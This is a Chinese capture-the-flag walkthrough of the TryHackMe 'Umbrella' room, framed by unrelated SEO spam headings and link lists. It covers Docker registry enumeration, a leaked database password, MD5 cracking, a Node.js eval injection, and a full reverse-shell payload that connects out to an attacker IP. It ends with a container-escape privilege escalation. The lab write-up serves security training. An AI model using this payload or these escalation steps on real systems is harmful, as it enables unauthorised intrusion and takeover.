当前位置: 首页 > news >正文

衡水提供网站制作公司哪家专业图们网络推广

衡水提供网站制作公司哪家专业,图们网络推广,全国网站建设有实力,公司介绍模板简短靶场介绍 Breach Umbrella Corp’s time-tracking server by exploiting misconfigurations around containerisation. 利用集装箱化的错误配置,破坏Umbrella公司的时间跟踪服务器。 Task 1 What is the DB password? 数据库的密码是多少? 端口扫描&am…

靶场介绍

Breach Umbrella Corp’s time-tracking server by exploiting misconfigurations around containerisation.

利用集装箱化的错误配置,破坏Umbrella公司的时间跟踪服务器。

Task 1

What is the DB password?

数据库的密码是多少?

在这里插入图片描述

端口扫描,发现开放了22、3306、5000、8080端口

首先看8080端口,是一个用户名密码的登录界面

在这里插入图片描述

使用dirsearch对其进行扫描,但是发现没有有价值的信息

在这里插入图片描述

于是将目光转移到5000端口上,在hacktricks官网查阅相关资料后,发现5000端口的利用方式如下

The easiest way to discover this service running is get it on the output of nmap. Anyway, note that as it's a HTTP based service it can be behind HTTP proxies and nmap won't detect it.
Some fingerprints:
If you access / nothing is returned in the response
If you access /v2/ then {} is returned
If you access /v2/_catalog you may obtain:{"repositories":["alpine","ubuntu"]}{"errors":[{"code":"UNAUTHORIZED","message":"authentication required","detail":	[{"Type":"registry","Class":"","Name":"catalog","Action":"*"}]}]}

可以在url后方加上/v2/_catalog查看是否存在信息泄露

在这里插入图片描述

接下去跟踪/umbrella/timetracking模块

在这里插入图片描述

继续跟踪latest模块

在这里插入图片描述

仔细翻阅后能够看到数据库用户、密码、数据表等等信息

在这里插入图片描述

Answer 1:Ng1-f3!Pe7-e5*****

·

What is the user flag?

用户标识符是什么?

进入数据库,查看是否能够获取到更多信息

在这里插入图片描述

查看数据库

在这里插入图片描述

进入timetracking库,查看数据表

在这里插入图片描述

发现只有一个users表,直接将内容都显示出来

在这里插入图片描述

这里将第一个用户的密码通过md5解密出来

在这里插入图片描述

使用他去登录8080的网站

在这里插入图片描述

发现是一个时间跟踪应用程序,暂无利用点,尝试用该用户登录SSH

在这里插入图片描述

查看用户标识符

在这里插入图片描述

Answer 2:THM{**********}

·

What is the root flag?

root的标识符是什么?

查看yml配置文件,发现

在这里插入图片描述

能够发现:它将./logs挂载到容器中的/logs,回到刚刚的8080网页,尝试随意输入一段数字

在这里插入图片描述

发现右边的数值就会+2,尝试输入一段字符串

在这里插入图片描述

不会有任何变化

查看前端界面app.js文件

在这里插入图片描述

发现代码中并没有对我们的输入进行过滤

var a = 2; a;(() => 3)()

上述代码均会将继续添加时间

利用漏洞,构造一段反弹shell

(function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/sh", []); var client = new net.Socket(); client.connect(9100, "10.6.20.210", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/;})();

kali上开启监听在这里插入图片描述

在这里插入图片描述

但是这是在docker容器中的root权限,我们还需要将其提升到本地权限

将/bin/bash复制到timeTracker-src文件夹中

在这里插入图片描述

接下来,修改容器内的权限

在这里插入图片描述

在claire-r用户执行bash -p以获得root权限

在这里插入图片描述

Answer 3:THM{*******}

http://www.tj-hxxt.cn/news/42793.html

相关文章:

  • 店铺设计效果图软件seo专业论坛
  • 阿里云网站建设好用吗南京响应式网站建设
  • 国外网站有备案吗seo百科
  • 网站建设应对客户问题的话术免费技能培训在哪里报名
  • 个人博客网站备案吗百度推广后台登陆官网
  • 做电销要在哪个网站上找资源百度快速收录网站
  • 泉州网站建设维护关键词优化哪家强
  • 有链接的网站怎么做产品推广步骤
  • 类似于美团的网站开发百度快速收录3元一条
  • 日本做暧视频小网站东莞互联网推广
  • 手机手机端网站建设个人网站免费推广
  • 无锡网站制作电话多少人民政府网站
  • 培训网站建设方案说明书网推平台有哪些
  • wordpress打开前台页面空白重庆好的seo平台
  • 描述自己做的网站百度关键词价格排行榜
  • 在线旅游网站建设方案长沙seo报价
  • 网站报价预算书市场营销毕业论文
  • 外贸网站风格怎样淘宝seo排名优化
  • 外贸网站建设 杭州推广方案设计
  • javaweb做网站实现邮件百度托管公司
  • 长沙网站开发的网站百度推广如何办理
  • 抚顺 网站建设百度网盘登录入口网页版
  • 建网站不花钱免费现在最好的免费的建站平台
  • 奉节做网站网站建设的意义和目的
  • 网站内容怎么做备份电脑版百度
  • 德州做名片的网站武汉网络推广有哪些公司
  • cms网站开发涉及的知识友情链接代码
  • 集团响应式网站建设360优化大师下载
  • 南京做网站企业网络营销策划师
  • 石湾做网站公司百度注册新账号